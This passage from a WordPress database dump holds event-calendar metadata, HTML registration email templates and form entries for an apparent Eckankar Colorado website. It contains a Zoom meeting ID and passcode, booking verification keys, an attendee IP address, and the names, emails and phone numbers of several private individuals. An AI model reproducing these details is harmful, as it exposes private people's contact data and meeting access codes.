_public','1'),(191953,269107,'mec_bfixed_fields','a:0:{}'),(191954,269107,'mec_fields','a:0:{}'),(191955,269107,'mec_event_status','EventScheduled'),(191956,269107,'mec_moved_online_link',''),(191957,269107,'mec_cancelled_reason',''),(191958,269107,'mec_display_cancellation_reason_in_single_page',''),(191959,269107,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(191960,269107,'passster_activate_global_protection',''),(191961,269107,'passster_activate_protection',''),(191962,269107,'passster_protection_type','password'),(191963,269107,'_wp_old_date','2022-01-18'),(191964,269107,'boldgrid_in_page_containers','1'),(191965,269107,'_dp_original','265425'),(191966,269107,'_edit_lock','1695344889:15'),(191967,269107,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(191968,269107,'_edit_last','15'),(191969,269107,'passster_area_shortcode',''),(191970,269107,'mec_cost_auto_calculate','0'),(191971,269107,'mec_style_per_event','global'),(191972,269107,'mec_trailer_url',''),(191973,269107,'mec_trailer_title',''),(191974,269107,'mec_start_datetime','2023-10-01 10:30 AM'),(191975,269107,'mec_end_datetime','2023-10-01 11:30 AM'),(191976,269107,'mec_sequence','2'),(191977,269107,'mec_event_gallery','a:0:{}'),(191978,269107,'mec_related_events','a:0:{}'),(191979,269107,'mec_banner','a:0:{}'),(191980,269107,'_thumbnail_id','268485'),(191981,269109,'_thumbnail_id','266410'),(191982,269109,'mec_color',''),(191983,269109,'mec_location_id','129'),(191984,269109,'mec_dont_show_map','0'),(191985,269109,'mec_organizer_id','1'),(191986,269109,'mec_read_more',''),(191987,269109,'mec_more_info',''),(191988,269109,'mec_more_info_title',''),(191989,269109,'mec_more_info_target','_self'),(191990,269109,'mec_cost',''),(191991,269109,'mec_currency','a:0:{}'),(191992,269109,'mec_additional_organizer_ids','a:0:{}'),(191993,269109,'mec_additional_location_ids','a:0:{}'),(191994,269109,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-08\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-08\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(191995,269109,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(191996,269109,'mec_certain_weekdays','a:0:{}'),(191997,269109,'mec_allday','0'),(191998,269109,'one_occurrence','0'),(191999,269109,'mec_hide_time','0'),(192000,269109,'mec_hide_end_time','0'),(192001,269109,'mec_comment',''),(192002,269109,'mec_timezone','global'),(192003,269109,'mec_countdown_method','global'),(192004,269109,'mec_public','1'),(192005,269109,'mec_start_date','2023-10-08'),(192006,269109,'mec_start_time_hour','10'),(192007,269109,'mec_start_time_minutes','30'),(192008,269109,'mec_start_time_ampm','AM'),(192009,269109,'mec_start_day_seconds','37800'),(192010,269109,'mec_end_date','2023-10-08'),(192011,269109,'mec_end_time_hour','11'),(192012,269109,'mec_end_time_minutes','30'),(192013,269109,'mec_end_time_ampm','AM'),(192014,269109,'mec_end_day_seconds','41400'),(192015,269109,'mec_repeat_status','0'),(192016,269109,'mec_repeat_type',''),(192017,269109,'mec_repeat_interval','1'),(192018,269109,'mec_repeat_end',''),(192019,269109,'mec_repeat_end_at_occurrences','9'),(192020,269109,'mec_repeat_end_at_date',''),(192021,269109,'mec_advanced_days','a:0:{}'),(192022,269109,'mec_in_days',''),(192023,269109,'mec_not_in_days',''),(192024,269109,'mec_hourly_schedules','a:0:{}'),(192025,269109,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192026,269109,'mec_tickets','a:1:{i:1;a:21:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:12:\"category_ids\";a:0:{}s:2:\"id\";i:1;}}'),(192027,269109,'mec_fees_global_inheritance','1'),(192028,269109,'mec_fees','a:0:{}'),(192029,269109,'mec_ticket_variations_global_inheritance','1'),(192030,269109,'mec_ticket_variations','a:0:{}'),(192031,269109,'mec_reg_fields_global_inheritance','1'),(192032,269109,'mec_reg_fields','a:0:{}'),(192033,269109,'mec_bfixed_fields','a:0:{}'),(192034,269109,'mec_op','a:0:{}'),(192035,269109,'mec_fields','a:0:{}'),(192036,269109,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5404:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4031:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(193233,269164,'mec_gateway','MEC_gateway_free'),(193234,269164,'mec_gateway_label','Free'),(193235,269164,'mec_user_id','1000021'),(193236,269164,'mec_verified','1'),(193237,269164,'mec_verification_key','3752a837f036863484a38b0606ee89a4'),(193238,269164,'mec_cancellation_key','411b200a183f2bcbaf6a6980ad8a540f'),(193239,269164,'mec_confirmed','1'),(193240,269164,'mec_event_id','269109'),(193241,269164,'mec_date','1696761000:1696764600'),(193242,269164,'mec_ticket_id',',1,'),(193243,269164,'mec_booking_time','2023-10-03 21:31:32'),(193244,269164,'mec_all_dates','a:0:{}'),(193245,269164,'mec_other_dates','a:0:{}'),(193246,269164,'mec_attention_time','1696761000:1696764600'),(193247,269164,'mec_attention_time_start','1696761000'),(193248,269164,'mec_attention_time_end','1696764600'),(193249,269164,'mec_book_date_submit','20231003213132'),(193250,269164,'mec_booking_location','129'),(193251,269164,'mec_ticket_price_1','0'),(193252,269164,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:5:\"Test2\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(192037,269109,'mec_event_status','EventScheduled'),(192038,269109,'mec_moved_online_link',''),(192039,269109,'mec_cancelled_reason',''),(192040,269109,'mec_display_cancellation_reason_in_single_page',''),(192041,269109,'protect_children',''),(192042,269109,'passster_activate_global_protection',''),(192043,269109,'passster_activate_protection',''),(192044,269109,'passster_protection_type','password'),(192045,269109,'boldgrid_hide_page_title','0'),(192046,269109,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(192047,269109,'boldgrid_in_page_containers','1'),(192048,269109,'_dp_original','266522'),(192049,269109,'_edit_lock','1696390214:2'),(192050,269109,'_edit_last','2'),(192051,269109,'_wp_old_date','2022-04-30'),(192052,269109,'passster_area_shortcode',''),(192053,269109,'mec_cost_auto_calculate','0'),(192054,269109,'mec_style_per_event','global'),(192055,269109,'mec_trailer_url',''),(192056,269109,'mec_trailer_title',''),(192057,269109,'mec_start_datetime','2023-10-08 10:30 AM'),(192058,269109,'mec_end_datetime','2023-10-08 11:30 AM'),(192059,269109,'mec_sequence','3'),(192060,269109,'mec_event_gallery','a:0:{}'),(192061,269109,'mec_related_events','a:0:{}'),(192062,269109,'mec_banner','a:0:{}'),(193232,269164,'mec_transaction_id','UXS79443'),(192063,269111,'protect_children',''),(192064,269111,'mec_color',''),(192065,269111,'mec_location_id','118'),(192066,269111,'mec_dont_show_map','0'),(192067,269111,'mec_organizer_id','1'),(192068,269111,'mec_read_more',''),(192069,269111,'mec_more_info',''),(192070,269111,'mec_more_info_title',''),(192071,269111,'mec_more_info_target','_self'),(192072,269111,'mec_cost',''),(192073,269111,'mec_currency','a:0:{}'),(192074,269111,'mec_additional_organizer_ids','a:0:{}'),(192075,269111,'mec_additional_location_ids','a:0:{}'),(192076,269111,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-04\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-04\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192077,269111,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192078,269111,'mec_certain_weekdays','a:0:{}'),(192079,269111,'mec_allday','0'),(192080,269111,'one_occurrence','0'),(192081,269111,'mec_hide_time','0'),(192082,269111,'mec_hide_end_time','0'),(192083,269111,'mec_comment',''),(192084,269111,'mec_timezone','global'),(192085,269111,'mec_countdown_method','global'),(192086,269111,'mec_public','1'),(192087,269111,'mec_start_date','2023-10-04'),(192088,269111,'mec_start_time_hour','7'),(192089,269111,'mec_start_time_minutes','0'),(192090,269111,'mec_start_time_ampm','PM'),(192091,269111,'mec_start_day_seconds','68400'),(192092,269111,'mec_end_date','2023-10-04'),(192093,269111,'mec_end_time_hour','8'),(192094,269111,'mec_end_time_minutes','0'),(192095,269111,'mec_end_time_ampm','PM'),(192096,269111,'mec_end_day_seconds','72000'),(192097,269111,'mec_repeat_status','0'),(192098,269111,'mec_repeat_type',''),(192099,269111,'mec_repeat_interval','1'),(192100,269111,'mec_repeat_end',''),(192101,269111,'mec_repeat_end_at_occurrences','9'),(192102,269111,'mec_repeat_end_at_date',''),(192103,269111,'mec_advanced_days','a:0:{}'),(192104,269111,'mec_in_days',''),(192105,269111,'mec_not_in_days',''),(192106,269111,'mec_hourly_schedules','a:0:{}'),(192107,269111,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192108,269111,'mec_tickets','a:0:{}'),(192109,269111,'mec_fees_global_inheritance','1'),(192110,269111,'mec_fees','a:0:{}'),(192111,269111,'mec_ticket_variations_global_inheritance','1'),(192112,269111,'mec_ticket_variations','a:0:{}'),(192113,269111,'mec_reg_fields_global_inheritance','1'),(192114,269111,'mec_reg_fields','a:0:{}'),(192115,269111,'mec_bfixed_fields','a:0:{}'),(192116,269111,'mec_op','a:0:{}'),(192117,269111,'mec_fields','a:0:{}'),(192118,269111,'mec_event_status','EventScheduled'),(192119,269111,'mec_moved_online_link',''),(192120,269111,'mec_cancelled_reason',''),(192121,269111,'mec_display_cancellation_reason_in_single_page',''),(192122,269111,'boldgrid_hide_page_title','0'),(192123,269111,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(192124,269111,'passster_activate_global_protection',''),(192125,269111,'passster_activate_protection',''),(192126,269111,'passster_protection_type','password'),(192127,269111,'boldgrid_in_page_containers','1'),(192128,269111,'_dp_original','265240'),(192129,269111,'_edit_lock','1695357062:15'),(192130,269111,'passster_area_shortcode',''),(192131,269111,'_edit_last','15'),(192132,269111,'_wp_old_date','2023-01-14'),(192133,269111,'mec_cost_auto_calculate','0'),(192134,269111,'mec_style_per_event','global'),(192135,269111,'mec_trailer_url',''),(192136,269111,'mec_trailer_title',''),(192137,269111,'mec_start_datetime','2023-10-04 07:00 PM'),(192138,269111,'mec_end_datetime','2023-10-04 08:00 PM'),(192139,269111,'mec_sequence','15'),(192140,269111,'mec_event_gallery','a:0:{}'),(192141,269111,'mec_related_events','a:0:{}'),(192142,269111,'mec_banner','a:0:{}'),(192143,269112,'_wp_attached_file','2023/09/PathToGod.webp'),(192144,269112,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:22:\"2023/09/PathToGod.webp\";s:8:\"filesize\";i:24452;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"PathToGod-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8544;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"PathToGod-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3814;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"PathToGod-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9276;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:22:\"PathToGod-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17680;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"PathToGod-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14930;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"PathToGod-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11508;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"PathToGod-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10512;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192145,269111,'_thumbnail_id','269112'),(192146,269113,'_field_654','Joan'),(192147,269113,'_field_652','Riester'),(192148,269113,'_field_653','joanieriester@gmail.com'),(192149,269113,'_field_651','(719) 338-4544'),(192150,269113,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(192151,269113,'_field_649',''),(192152,269113,'_form_id','61'),(192153,269113,'_seq_num','12'),(192154,269114,'_field_654','Allene'),(192155,269114,'_field_652','Dotson'),(192156,269114,'_field_653','Allene839@outlook.com'),(192157,269114,'_field_651','(801) 440-2516'),(192158,269114,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(192159,269114,'_field_649',''),(192160,269114,'_form_id','61'),(192161,269114,'_seq_num','13'),(192162,269115,'_field_133','FRED . '),(192163,269115,'_field_134','IBURI . '),(192164,269115,'_field_135','fkurichia@yahoo.com'),(192165,269115,'_field_137','RE - REQUESTING - THE 